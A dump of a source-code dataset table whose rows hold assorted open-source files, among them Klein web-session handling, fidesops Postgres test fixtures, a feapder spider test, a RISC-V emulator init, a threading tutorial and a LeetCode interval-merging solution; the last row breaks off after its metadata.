hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d49fc7ede1c72540847e941c37d5dac38d26affa
| 1,911
|
py
|
Python
|
FindU.py
|
SWCapstone2021/NLP
|
3354153542603f8eef6a96994c903a3741ed31ae
|
[
"Apache-2.0"
] | null | null | null |
FindU.py
|
SWCapstone2021/NLP
|
3354153542603f8eef6a96994c903a3741ed31ae
|
[
"Apache-2.0"
] | 21
|
2021-05-10T11:13:07.000Z
|
2021-06-14T06:48:53.000Z
|
FindU.py
|
SWCapstone2021/NLP
|
3354153542603f8eef6a96994c903a3741ed31ae
|
[
"Apache-2.0"
] | null | null | null |
import os
from pprint import pprint as pp
from youtube_transcript_api import YouTubeTranscriptApi
from QA import load_qa_model, QA_system
from STT import load_stt_model, stt
from Summarization import load_summ_model, summary_script
from wordembedding import *
os.environ["CUDA_VISIBLE_DEVICES"] = "2"
def download_script(id):
transcript = YouTubeTranscriptApi.get_transcripts([id], languages=['ko'])
transcript = transcript[0]
sub = transcript[id]
for x in sub:
x.pop('duration', None)
return sub
if __name__ == "__main__":
i = input("fucntion num: 1(ctrl+F), 2(reliability), 3(STT), 4(association), 5(summarization), 6(QA)")
json_file = download_script('PRlueK97918')
if i == '1':
SearchingValue = input("keyword:")
result_script = ctrl_f(SearchingValue, json_file)
pp(result_script)
if i == '2':
sc_model = load_sc_model()
SearchingValue = input("keyword:")
score = cosin_similar(SearchingValue, json_file, sc_model)
print(score)
if i == '3':
print("Load model...", end='')
stt_model, stt_vocab = load_stt_model()
print("done")
audio_path = 'data/origin_audio/2YD2p24EKb4.wav'
sentences = stt(stt_model, stt_vocab, audio_path)
# pp(sentences[:5])
if i == '4':
wm_model = load_wm_model()
SearchingValue = input("keyword:")
result_script = association_f(SearchingValue, json_file, wm_model)
# pp(result_script)
if i == '5':
summ_model = load_summ_model()
summ_script = summary_script(json_file, summ_model)
pp(summ_script)
if i == '6':
print("Load model...", end='')
qa_model, qa_tokenizer = load_qa_model()
print("done")
question = '이혼한 날'
answers = QA_system(qa_model, qa_tokenizer, question, json_file)
# pp(answers[:5)
| 27.3
| 106
| 0.639456
|
f389b7bb3b1e51c81cc14c754c3fd3ee0ee29668
| 735
|
py
|
Python
|
python_module/threading_study/threading_study03.py
|
panc-test/python-study
|
fb172ed4a4f7fb521de9a005cd55115ad63a5b6d
|
[
"MIT"
] | 1
|
2021-09-17T09:32:56.000Z
|
2021-09-17T09:32:56.000Z
|
python_module/threading_study/threading_study03.py
|
panc-test/python-study
|
fb172ed4a4f7fb521de9a005cd55115ad63a5b6d
|
[
"MIT"
] | 2
|
2021-05-11T05:47:13.000Z
|
2021-05-11T05:48:10.000Z
|
python_module/threading_study/threading_study03.py
|
panc-test/python-study
|
fb172ed4a4f7fb521de9a005cd55115ad63a5b6d
|
[
"MIT"
] | null | null | null |
"""
守护线程:
主线程不管守护线程的执行情况,只要是其他子线程结束且主线程执行完毕,主线程都会关闭。
常见方法:
1、setDaemon(True)方法可以把子线程设置为主线程的守护线程,此方法必须在start之前
2、join()方法,让主线程等待子线程执行,此方法在start之后
"""
import threading
import time
def run1(name,n):
for _ in range(n): #_下划线表示临时变量, 仅用一次,后面无需再用到
print(name,time.ctime())
time.sleep(1)
def run2(name,n):
for _ in range(n):
print(name,time.ctime())
time.sleep(1)
if __name__ == '__main__':
"""
设置子线程t1为守护线程,主线程不等t1运行结束,只要其他的子线程t2运行结果,就会关闭主线程。
"""
t1 = threading.Thread(target=run1,args=("线程1",10,)) #注意args参数类型是元组并以“,”结尾
t2 = threading.Thread(target=run2,args=("线程2",5,))
t1.setDaemon(True) #设置t1为守护线程
t1.start()
t2.start()
# t1.join() ##设置主线程等待子线程t1运行结束
| 21.617647
| 79
| 0.655782
|
e006fb3bf5c048ef0e328e016aff03490b25a193
| 957
|
py
|
Python
|
riscemu/__init__.py
|
jodalyst/riscemu
|
cede73c3c93c1d00168aa020dd9d982a213e3572
|
[
"MIT"
] | 9
|
2021-07-08T11:22:55.000Z
|
2022-01-30T10:32:48.000Z
|
riscemu/__init__.py
|
jodalyst/riscemu
|
cede73c3c93c1d00168aa020dd9d982a213e3572
|
[
"MIT"
] | 8
|
2021-12-03T18:16:19.000Z
|
2022-03-31T20:49:09.000Z
|
riscemu/__init__.py
|
jodalyst/riscemu
|
cede73c3c93c1d00168aa020dd9d982a213e3572
|
[
"MIT"
] | 2
|
2022-01-16T05:50:04.000Z
|
2022-03-23T21:27:27.000Z
|
"""
RiscEmu (c) 2021 Anton Lydike
SPDX-License-Identifier: MIT
This package aims at providing an all-round usable RISC-V emulator and debugger
It contains everything needed to run assembly files, so you don't need any custom compilers or toolchains
"""
from .Exceptions import RiscemuBaseException, LaunchDebuggerException, InvalidSyscallException, LinkerException, \
ParseException, NumberFormatException, InvalidRegisterException, MemoryAccessException, OutOfMemoryException
from .Tokenizer import RiscVInput, RiscVTokenizer
from .Executable import Executable, LoadedExecutable, LoadedMemorySection
from .ExecutableParser import ExecutableParser
from .instructions import *
from .MMU import MMU
from .Registers import Registers
from .Syscall import SyscallInterface, Syscall
from .CPU import CPU
from .Config import RunConfig
__author__ = "Anton Lydike <Anton@Lydike.com>"
__copyright__ = "Copyright 2021 Anton Lydike"
__version__ = '1.0.0'
| 30.870968
| 114
| 0.819227
|
49fa2c9b5405e2e467e3066bf6b8366ce35e84cf
| 1,210
|
py
|
Python
|
modules/dense_correspondence_manipulation/utils/constants.py
|
WangYixuan12/pytorch-dense-correspondence
|
82f2a37aaadc7638a89a224bd772dac7dad36906
|
[
"BSD-3-Clause"
] | 520
|
2018-06-25T00:46:38.000Z
|
2022-03-27T11:01:07.000Z
|
modules/dense_correspondence_manipulation/utils/constants.py
|
mmichelis/dense-object-nets-python3
|
c77cac0271219cd11940004e910951cdf4765e51
|
[
"BSD-3-Clause"
] | 66
|
2018-07-23T15:16:04.000Z
|
2021-08-10T13:40:25.000Z
|
modules/dense_correspondence_manipulation/utils/constants.py
|
mmichelis/dense-object-nets-python3
|
c77cac0271219cd11940004e910951cdf4765e51
|
[
"BSD-3-Clause"
] | 121
|
2018-06-26T13:52:03.000Z
|
2022-03-27T11:00:45.000Z
|
import os
import dense_correspondence_manipulation.utils.utils as utils
CHANGE_DETECTION_CONFIG_FILE = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'config', 'stations', 'RLG_iiwa_1', 'change_detection.yaml')
CHANGE_DETECTION_BACKGROUND_SUBTRACTION_CONFIG_FILE = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'config', 'stations', 'RLG_iiwa_1', 'change_detection_background_subtraction.yaml')
BACKGROUND_SCENE_DATA_FOLDER = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'data_volume', 'pdc','logs_proto', '14_background')
DEPTH_IM_SCALE = 1000.0 # This represents that depth images are saved as uint16, where the integer value
# is depth in millimeters. So this scale just converts millimeters to meters.
DEPTH_IM_RESCALE = 4000.0 # Only for visualization purposes
IMAGE_NET_MEAN = [0.485, 0.456, 0.406]
IMAGE_NET_STD_DEV = [0.229, 0.224, 0.225]
DEFAULT_IMAGE_MEAN = [0.5573105812072754, 0.37420374155044556, 0.37020164728164673]
DEFAULT_IMAGE_STD_DEV = [0.24336038529872894, 0.2987397611141205, 0.31875079870224]
LABEL_COLORS = [(255,0,0), (0,255,0), (0,0,255), (255,0,255), (0,125,125), (125,125,0), (200,255,50), (255, 125, 220), (10, 125, 255)]
| 57.619048
| 191
| 0.761983
|
994ad2c8c2984a3794a0100af848df796ce54a6d
| 12,621
|
py
|
Python
|
src/klein/_session.py
|
dimabe/klein
|
272508296d1d0fe9206ce1e33ed572d775f164ac
|
[
"MIT"
] | null | null | null |
src/klein/_session.py
|
dimabe/klein
|
272508296d1d0fe9206ce1e33ed572d775f164ac
|
[
"MIT"
] | null | null | null |
src/klein/_session.py
|
dimabe/klein
|
272508296d1d0fe9206ce1e33ed572d775f164ac
|
[
"MIT"
] | null | null | null |
# -*- test-case-name: klein.test.test_session -*-
from typing import (
Any, Callable, Optional as _Optional, TYPE_CHECKING, Union
)
import attr
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.python.reflect import qual
from twisted.web.http import UNAUTHORIZED
from twisted.web.resource import Resource
from zope.interface import implementer
from zope.interface.interfaces import IInterface
from .interfaces import (
EarlyExit, IDependencyInjector, IRequestLifecycle, IRequiredParameter,
ISession, ISessionProcurer, ISessionStore, NoSuchSession, SessionMechanism,
TooLateForCookies
)
if TYPE_CHECKING: # pragma: no cover
from mypy_extensions import Arg, KwArg
from twisted.web.iweb import IRequest
from twisted.python.components import Componentized
from typing import Dict, Sequence, Text, TypeVar
T = TypeVar('T')
else:
Arg = KwArg = lambda t, *x: t
@implementer(ISessionProcurer) # type: ignore[misc]
@attr.s
class SessionProcurer(object):
"""
A L{SessionProcurer} procures a session from a request and a store.
@ivar _store: The session store to procure a session from.
@type _store: L{klein.interfaces.ISessionStore}
@ivar _maxAge: The maximum age (in seconds) of the session cookie.
@type _maxAge: L{int}
@ivar _secureCookie: The name of the cookie to use for sessions protected
with TLS (i.e. HTTPS).
@type _secureCookie: L{bytes}
@ivar _insecureCookie: The name of the cookie to use for sessions I{not}
protected with TLS (i.e. HTTP).
@type _insecureCookie: L{bytes}
@ivar _cookieDomain: If set, the domain name to restrict the session cookie
to.
@type _cookieDomain: L{None} or L{bytes}
@ivar _cookiePath: If set, the URL path to restrict the session cookie to.
@type _cookiePath: L{bytes}
@ivar _secureTokenHeader: The name of the HTTPS header to try to extract a
session token from; API clients should use this header, rather than a
cookie.
@type _secureTokenHeader: L{bytes}
@ivar _insecureTokenHeader: The name of the HTTP header to try to extract a
session token from; API clients should use this header, rather than a
cookie.
@type _insecureTokenHeader: L{bytes}
@ivar _setCookieOnGET: Automatically request that the session store create
a session if one is not already associated with the request and the
request is a GET.
@type _setCookieOnGET: L{bool}
"""
_store = attr.ib(type=ISessionStore) # type: ignore[misc]
_maxAge = attr.ib(type=int, default=3600)
_secureCookie = attr.ib(type=bytes, default=b"Klein-Secure-Session")
_insecureCookie = attr.ib(type=bytes, default=b"Klein-INSECURE-Session")
_cookieDomain = attr.ib(type=_Optional[bytes], default=None)
_cookiePath = attr.ib(type=bytes, default=b"/")
_secureTokenHeader = attr.ib(type=bytes, default=b"X-Auth-Token")
_insecureTokenHeader = attr.ib(type=bytes,
default=b"X-INSECURE-Auth-Token")
_setCookieOnGET = attr.ib(type=bool, default=True)
@inlineCallbacks
def procureSession(self, request, forceInsecure=False):
# type: (IRequest, bool) -> Any
alreadyProcured = request.getComponent(ISession) # type: ignore[misc]
if alreadyProcured is not None:
if not forceInsecure or not request.isSecure():
returnValue(alreadyProcured)
if request.isSecure():
if forceInsecure:
tokenHeader = self._insecureTokenHeader
cookieName = self._insecureCookie # type: Union[Text, bytes]
sentSecurely = False
else:
tokenHeader = self._secureTokenHeader
cookieName = self._secureCookie
sentSecurely = True
else:
# Have we inadvertently disclosed a secure token over an insecure
# transport, for example, due to a buggy client?
allPossibleSentTokens = (
sum([request.requestHeaders.getRawHeaders(header, [])
for header in [self._secureTokenHeader,
self._insecureTokenHeader]], []) +
[it for it in [request.getCookie(cookie)
for cookie in [self._secureCookie,
self._insecureCookie]] if it]
) # type: Sequence[Text]
# Does it seem like this check is expensive? It sure is! Don't want
# to do it? Turn on your dang HTTPS!
yield self._store.sentInsecurely(allPossibleSentTokens)
tokenHeader = self._insecureTokenHeader
cookieName = self._insecureCookie
sentSecurely = False
# Fun future feature: honeypot that does this over HTTPS, but sets
# isSecure() to return false because it serves up a cert for the
# wrong hostname or an invalid cert, to keep API clients honest
# about chain validation.
sentHeader = (request.getHeader(tokenHeader) or b"").decode("utf-8")
sentCookie = (request.getCookie(cookieName) or b"").decode("utf-8")
if sentHeader:
mechanism = SessionMechanism.Header
else:
mechanism = SessionMechanism.Cookie
if not (sentHeader or sentCookie):
session = None
else:
try:
session = yield self._store.loadSession(
sentHeader or sentCookie, sentSecurely, mechanism
)
except NoSuchSession:
if mechanism == SessionMechanism.Header:
raise
session = None
if (
mechanism == SessionMechanism.Cookie and
(session is None or session.identifier != sentCookie)
):
if session is None:
if request.startedWriting:
# At this point, if the mechanism is Header, we either have
# a valid session or we bailed after NoSuchSession above.
raise TooLateForCookies(
"You tried initializing a cookie-based session too"
" late in the request pipeline; the headers"
" were already sent."
)
if request.method != b'GET':
# Sessions should only ever be auto-created by GET
# requests; there's no way that any meaningful data
# manipulation could succeed (no CSRF token check could
# ever succeed, for example).
raise NoSuchSession(
u"Can't initialize a session on a {method} request."
.format(method=request.method.decode("ascii"))
)
if not self._setCookieOnGET:
# We don't have a session ID at all, and we're not allowed
# by policy to set a cookie on the client.
raise NoSuchSession(
u"Cannot auto-initialize a session for this request."
)
session = yield self._store.newSession(sentSecurely, mechanism)
identifierInCookie = session.identifier
if not isinstance(identifierInCookie, str):
identifierInCookie = identifierInCookie.encode("ascii")
if not isinstance(cookieName, str):
cookieName = cookieName.decode("ascii")
request.addCookie(
cookieName, identifierInCookie, max_age=str(self._maxAge),
domain=self._cookieDomain, path=self._cookiePath,
secure=sentSecurely, httpOnly=True,
)
if sentSecurely or not request.isSecure():
# Do not cache the insecure session on the secure request, thanks.
request.setComponent(ISession, session) # type: ignore[misc]
returnValue(session)
_procureProcurerType = Union[
Callable[[Any], ISessionProcurer],
Callable[[], ISessionProcurer]
]
_kleinRenderable = Any
_routeCallable = Any
_kleinCallable = Callable[..., _kleinRenderable]
_kleinDecorator = Callable[[_kleinCallable], _kleinCallable]
_requirerResult = Callable[[Arg(_routeCallable, 'route'), KwArg(Any)],
Callable[[_kleinCallable], _kleinCallable]]
class AuthorizationDenied(Resource, object):
def __init__(self, interface, instance):
# type: (IInterface, Any) -> None
self._interface = interface
super(AuthorizationDenied, self).__init__()
def render(self, request):
# type: (IRequest) -> bytes
request.setResponseCode(UNAUTHORIZED)
return "{} DENIED".format(qual(self._interface)).encode('utf-8')
@implementer(IDependencyInjector, IRequiredParameter) # type: ignore[misc]
@attr.s
class Authorization(object):
"""
Declare that a C{require}-decorated function requires a certain interface
be authorized from the session.
This is a dependnecy injector used in conjunction with a L{klein.Requirer},
like so::
from klein import Requirer, SesssionProcurer
from klein.interfaces import ISession
from myapp import ISuperDuperAdmin
requirer = Requirer()
procurer = SessionProcurer(store=someSessionStore)
@requirer.prerequisite(ISession)
def sessionize(request):
return procurer.procureSession(request)
app = Klein()
@requirer.require(
app.route("/admin"),
adminPowers=Authorization(ISuperDuperAdmin)
)
def myRoute(adminPowers):
return 'ok admin: ' + adminPowers.doAdminThing()
In this example, ISuperDuperAdmin is an interface known to your
application, and (via authorization plugins depending on your session
storage backend) to your session store. It has a doAdminThing method.
When a user hits /admin in their browser, if they are duly authorized,
they'll see 'ok admin: ' and whatever the super-secret result of
doAdminThing is. If not, by default, they'll simply get an HTTP
UNAUTHORIZED response that says "myapp.ISuperDuperAdmin DENIED". (This
behavior can be customized via the C{whenDenied} parameter to
L{Authorization}.)
@ivar _interface: the interface that is required. a provider of this
interface is what will be dependency-injected.
@ivar _required: is this authorization required? If so (the default),
don't invoke the application code if it cannot be authorized by the
procured session, and instead return the object specified by whenDenied
from the dependency-injection process. If not, then just pass None if
it is not on the session.
@ivar _whenDenied: when this authorization is denied, what object - usually
an IResource - should be returned to the route decorator that was
passed to L{Requirer.require}? Note that this will never be used if
C{required} is set to C{False}.
"""
_interface = attr.ib(type=IInterface)
_required = attr.ib(type=bool, default=True)
_whenDenied = attr.ib(type=Callable[[IInterface, Any], Any],
default=AuthorizationDenied)
def registerInjector(self, injectionComponents, parameterName, lifecycle):
# type: (Componentized, str, IRequestLifecycle) -> IDependencyInjector
"""
Register this authorization to inject a parameter.
"""
return self
@inlineCallbacks
def injectValue(self, instance, request, routeParams):
# type: (Any, IRequest, Dict[str, Any]) -> Any
"""
Inject a value by asking the request's session.
"""
# TODO: this could be optimized to do fewer calls to 'authorize' by
# collecting all the interfaces that are necessary and then using
# addBeforeHook; the interface would not need to change.
session = ISession(request) # type: ignore[misc]
provider = (
(yield session.authorize([self._interface])).get(self._interface)
)
if self._required and provider is None:
raise EarlyExit(self._whenDenied(self._interface, instance))
# TODO: CSRF protection should probably go here
returnValue(provider)
def finalize(self):
# type: () -> None
"""
Nothing to finalize when registering.
"""
| 41.245098
| 79
| 0.635924
|
f227573c8fb6cfa306fefbc5b8dc23a9b3b28225
| 123
|
py
|
Python
|
states.py
|
GrishaVoronin/Rulimpbot
|
61dd2ef2d4d654ff1ae9e602dc92ffaefef3077d
|
[
"Apache-2.0"
] | null | null | null |
states.py
|
GrishaVoronin/Rulimpbot
|
61dd2ef2d4d654ff1ae9e602dc92ffaefef3077d
|
[
"Apache-2.0"
] | null | null | null |
states.py
|
GrishaVoronin/Rulimpbot
|
61dd2ef2d4d654ff1ae9e602dc92ffaefef3077d
|
[
"Apache-2.0"
] | null | null | null |
from aiogram.dispatcher.filters.state import StatesGroup, State
class UserParams(StatesGroup):
SetOlympiad = State()
| 20.5
| 63
| 0.788618
|
b843be025634b756b6baeb5718528af4e4ca8344
| 375
|
py
|
Python
|
main.py
|
JustAnOkapi/Unit-Circle
|
6147f9119f70fd8c109aa79dd45bc62031edf610
|
[
"Unlicense"
] | null | null | null |
main.py
|
JustAnOkapi/Unit-Circle
|
6147f9119f70fd8c109aa79dd45bc62031edf610
|
[
"Unlicense"
] | null | null | null |
main.py
|
JustAnOkapi/Unit-Circle
|
6147f9119f70fd8c109aa79dd45bc62031edf610
|
[
"Unlicense"
] | null | null | null |
from sympy import *
from prettytable import PrettyTable, ALL
circle = PrettyTable(["Degree", "Radian", "sin()", "cos()"])
circle.hrules = ALL
for deg in [0,30,45,60,90,120,135,150,180,210,225,240,300,315,330]:
rad = Rational(deg, 180) * pi
circle.add_row([deg, pretty(rad), pretty(sin(rad)), pretty(cos(rad))])
pprint(circle)
# idk how this took 2 hours to do
| 34.090909
| 75
| 0.669333
|
f29362acf8c625402b273c9a2bb9ed5536e93bb9
| 510
|
py
|
Python
|
Array/Medium/56. Merge Intervals/solution.py
|
tintindas/leetcode-solutions
|
eb97254dafddffccbce048ef04aea1e934277282
|
[
"MIT"
] | 1
|
2021-03-10T02:48:39.000Z
|
2021-03-10T02:48:39.000Z
|
Array/Medium/56. Merge Intervals/solution.py
|
tintindas/leetcode-solutions
|
eb97254dafddffccbce048ef04aea1e934277282
|
[
"MIT"
] | null | null | null |
Array/Medium/56. Merge Intervals/solution.py
|
tintindas/leetcode-solutions
|
eb97254dafddffccbce048ef04aea1e934277282
|
[
"MIT"
] | 1
|
2021-03-18T08:22:29.000Z
|
2021-03-18T08:22:29.000Z
|
from typing import List
class Solution:
def merge(self, intervals: List[List[int]]) -> List[List[int]]:
res = []
intervals.sort()
start = intervals[0][0]
end = intervals[0][1]
for i in range(1, len(intervals)):
s, e = intervals[i]
if end < s:
res.append([start, end])
start = s
end = e
else:
end = max(e, end)
res.append([start, end])
return res
| 23.181818
| 67
| 0.452941
|
bd02ef3c5a1fc287510851ff6af5853af4628f8a
| 1,280
|
py
|
Python
|
src/python/pants/backend/jvm/subsystems/jar_tool.py
|
revl/pants
|
8ad83e4ca80c095d44efceafd8b41e575da39c65
|
[
"Apache-2.0"
] | 1
|
2021-05-05T18:58:28.000Z
|
2021-05-05T18:58:28.000Z
|
src/python/pants/backend/jvm/subsystems/jar_tool.py
|
revl/pants
|
8ad83e4ca80c095d44efceafd8b41e575da39c65
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/backend/jvm/subsystems/jar_tool.py
|
revl/pants
|
8ad83e4ca80c095d44efceafd8b41e575da39c65
|
[
"Apache-2.0"
] | 3
|
2020-06-30T08:28:13.000Z
|
2021-07-28T09:35:57.000Z
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.jvm.subsystems.jvm_tool_mixin import JvmToolMixin
from pants.base.workunit import WorkUnitLabel
from pants.java.jar.jar_dependency import JarDependency
from pants.subsystem.subsystem import Subsystem
class JarTool(JvmToolMixin, Subsystem):
options_scope = "jar-tool"
@classmethod
def register_options(cls, register):
super().register_options(register)
cls.register_jvm_tool(
register,
"jar-tool",
classpath=[JarDependency(org="org.pantsbuild", name="jar-tool", rev="0.0.16"),],
)
def run(self, context, runjava, args):
return runjava(
self.tool_classpath_from_products(
context.products, "jar-tool", scope=self.options_scope
),
"org.pantsbuild.tools.jar.Main",
jvm_options=self.get_options().jvm_options,
args=args,
workunit_name="jar-tool",
workunit_labels=[
WorkUnitLabel.TOOL,
WorkUnitLabel.JVM,
WorkUnitLabel.NAILGUN,
WorkUnitLabel.SUPPRESS_LABEL,
],
)
| 33.684211
| 92
| 0.632813
|
a28862cd74cd574b75c1b2f7316afcd4dc0db015
| 278
|
py
|
Python
|
lego/apps/permissions/validators.py
|
andrinelo/lego
|
9b53c8fe538d9107b980a70e2a21fb487cc3b290
|
[
"MIT"
] | null | null | null |
lego/apps/permissions/validators.py
|
andrinelo/lego
|
9b53c8fe538d9107b980a70e2a21fb487cc3b290
|
[
"MIT"
] | null | null | null |
lego/apps/permissions/validators.py
|
andrinelo/lego
|
9b53c8fe538d9107b980a70e2a21fb487cc3b290
|
[
"MIT"
] | null | null | null |
from django.core.validators import RegexValidator
class KeywordPermissionValidator(RegexValidator):
regex = r'^/([a-zA-Z]+/)+$'
message = 'Keyword permissions can only contain forward slashes and letters ' \
'and must begin and end with a forward slash'
| 34.75
| 83
| 0.708633
|
51dcd1f55be9bc078de30dc520a30a33b11a8f78
| 1,088
|
py
|
Python
|
tests/air-spider/test_air_spider.py
|
RuixiangS/feapder
|
e21098c9d4f4ba001275f4d4d57d6ea4687b93a8
|
[
"MIT"
] | 876
|
2021-02-09T11:08:04.000Z
|
2022-03-31T21:14:11.000Z
|
tests/air-spider/test_air_spider.py
|
lovebull/feapder
|
1cee596380b6ce5e1615ef81d3e57a1b290129d9
|
[
"MIT"
] | 94
|
2021-02-20T07:59:28.000Z
|
2022-03-28T09:54:53.000Z
|
tests/air-spider/test_air_spider.py
|
lovebull/feapder
|
1cee596380b6ce5e1615ef81d3e57a1b290129d9
|
[
"MIT"
] | 172
|
2021-02-22T08:24:44.000Z
|
2022-03-29T08:15:27.000Z
|
# -*- coding: utf-8 -*-
"""
Created on 2020/4/22 10:41 PM
---------
@summary:
---------
@author: Boris
@email: boris_liu@foxmail.com
"""
import feapder
class TestAirSpider(feapder.AirSpider):
# __custom_setting__ = dict(
# LOG_LEVEL = "INFO"
# )
def start_callback(self):
print("爬虫开始")
def end_callback(self):
print("爬虫结束")
def start_requests(self, *args, **kws):
yield feapder.Request("https://www.baidu.com")
def download_midware(self, request):
# request.headers = {'User-Agent': ""}
# request.proxies = {"https":"https://12.12.12.12:6666"}
# request.cookies = {}
return request
def validate(self, request, response):
if response.status_code != 200:
raise Exception("response code not 200") # 重试
# if "哈哈" not in response.text:
# return False # 抛弃当前请求
def parse(self, request, response):
print(response.bs4().title)
print(response.xpath("//title").extract_first())
if __name__ == "__main__":
TestAirSpider().start()
| 22.204082
| 64
| 0.587316
|
fa1ed55c465c714cab7cbd8aebcd67ec78ad7fa2
| 6,170
|
py
|
Python
|
tests/fixtures/postgres_fixtures.py
|
autosuggested/fidesops
|
a399abbc39e8fc528bc31d1bd3f0419c3379e6f3
|
[
"Apache-2.0"
] | 41
|
2021-11-01T23:53:43.000Z
|
2022-03-22T23:07:56.000Z
|
tests/fixtures/postgres_fixtures.py
|
autosuggested/fidesops
|
a399abbc39e8fc528bc31d1bd3f0419c3379e6f3
|
[
"Apache-2.0"
] | 235
|
2021-11-01T20:31:55.000Z
|
2022-03-31T15:40:58.000Z
|
tests/fixtures/postgres_fixtures.py
|
autosuggested/fidesops
|
a399abbc39e8fc528bc31d1bd3f0419c3379e6f3
|
[
"Apache-2.0"
] | 12
|
2021-11-02T00:44:51.000Z
|
2022-03-14T16:23:10.000Z
|
import logging
import pytest
from typing import Dict, Generator, List
from uuid import uuid4
from sqlalchemy.orm import (
Session,
)
from sqlalchemy.sql import text
from sqlalchemy_utils.functions import (
create_database,
database_exists,
drop_database,
)
from fidesops.db.session import get_db_session, get_db_engine
from fidesops.models.connectionconfig import (
ConnectionConfig,
AccessLevel,
ConnectionType,
)
from fidesops.models.datasetconfig import DatasetConfig
from fidesops.models.policy import ActionType
from fidesops.models.privacy_request import (
ExecutionLog,
ExecutionLogStatus,
PrivacyRequest,
)
from fidesops.service.connectors import PostgreSQLConnector
from .application_fixtures import integration_secrets
logger = logging.getLogger(__name__)
@pytest.fixture
def postgres_example_test_dataset_config(
connection_config: ConnectionConfig,
db: Session,
example_datasets: List[Dict],
) -> Generator:
postgres_dataset = example_datasets[0]
fides_key = postgres_dataset["fides_key"]
connection_config.name = fides_key
connection_config.key = fides_key
connection_config.save(db=db)
dataset = DatasetConfig.create(
db=db,
data={
"connection_config_id": connection_config.id,
"fides_key": fides_key,
"dataset": postgres_dataset,
},
)
yield dataset
dataset.delete(db=db)
@pytest.fixture
def postgres_example_test_dataset_config_read_access(
read_connection_config: ConnectionConfig,
db: Session,
example_datasets: List[Dict],
) -> Generator:
postgres_dataset = example_datasets[0]
fides_key = postgres_dataset["fides_key"]
dataset = DatasetConfig.create(
db=db,
data={
"connection_config_id": read_connection_config.id,
"fides_key": fides_key,
"dataset": postgres_dataset,
},
)
yield dataset
dataset.delete(db=db)
@pytest.fixture(scope="function")
def postgres_execution_log(
db: Session,
privacy_request: PrivacyRequest,
) -> ExecutionLog:
el = ExecutionLog.create(
db=db,
data={
"dataset_name": "my-postgres-db",
"collection_name": "user",
"fields_affected": [
{
"path": "my-postgres-db:user:email",
"field_name": "email",
"data_categories": ["user.provided.identifiable.contact.email"],
}
],
"action_type": ActionType.access,
"status": ExecutionLogStatus.pending,
"privacy_request_id": privacy_request.id,
},
)
yield el
el.delete(db)
# TODO: Consolidate these
@pytest.fixture(scope="function")
def second_postgres_execution_log(
db: Session, privacy_request: PrivacyRequest
) -> ExecutionLog:
el = ExecutionLog.create(
db=db,
data={
"dataset_name": "my-postgres-db",
"collection_name": "address",
"fields_affected": [
{
"path": "my-postgres-db:address:street",
"field_name": "street",
"data_categories": ["user.provided.identifiable.contact.street"],
},
{
"path": "my-postgres-db:address:city",
"field_name": "city",
"data_categories": ["user.provided.identifiable.contact.city"],
},
],
"action_type": ActionType.access,
"status": ExecutionLogStatus.error,
"privacy_request_id": privacy_request.id,
"message": "Database timed out.",
},
)
yield el
el.delete(db)
@pytest.fixture(scope="function")
def connection_config(
db: Session,
) -> Generator:
connection_config = ConnectionConfig.create(
db=db,
data={
"name": str(uuid4()),
"key": "my_postgres_db_1",
"connection_type": ConnectionType.postgres,
"access": AccessLevel.write,
"secrets": integration_secrets["postgres_example"],
},
)
yield connection_config
connection_config.delete(db)
@pytest.fixture(scope="function")
def read_connection_config(
db: Session,
) -> Generator:
connection_config = ConnectionConfig.create(
db=db,
data={
"name": str(uuid4()),
"key": "my_postgres_db_1_read_config",
"connection_type": ConnectionType.postgres,
"access": AccessLevel.read,
"secrets": integration_secrets["postgres_example"],
},
)
yield connection_config
connection_config.delete(db)
@pytest.fixture(scope="function")
def postgres_integration_session_cls(connection_config):
example_postgres_uri = PostgreSQLConnector(connection_config).build_uri()
engine = get_db_engine(database_uri=example_postgres_uri)
SessionLocal = get_db_session(
engine=engine,
autocommit=True,
autoflush=True,
)
yield SessionLocal
@pytest.fixture(scope="function")
def postgres_integration_session(postgres_integration_session_cls):
yield postgres_integration_session_cls()
@pytest.fixture(scope="function")
def postgres_integration_db(postgres_integration_session):
if database_exists(postgres_integration_session.bind.url):
# Postgres cannot drop databases from within a transaction block, so
# we should drop the DB this way instead
drop_database(postgres_integration_session.bind.url)
create_database(postgres_integration_session.bind.url)
with open("./data/sql/postgres_example.sql", "r") as query_file:
lines = query_file.read().splitlines()
filtered = [line for line in lines if not line.startswith("--")]
queries = " ".join(filtered).split(";")
[
postgres_integration_session.execute(f"{text(query.strip())};")
for query in queries
if query
]
yield postgres_integration_session
drop_database(postgres_integration_session.bind.url)
| 29.663462
| 85
| 0.64376
|
0d173ca56c3efb0f15e676be4b598d2e6aec7b16
| 1,075
|
py
|
Python
|
amazon-practice/python/arrays-and-strings/2-longest-substring-without-repeating-characters.py
|
souradeepta/leetcode-practice
|
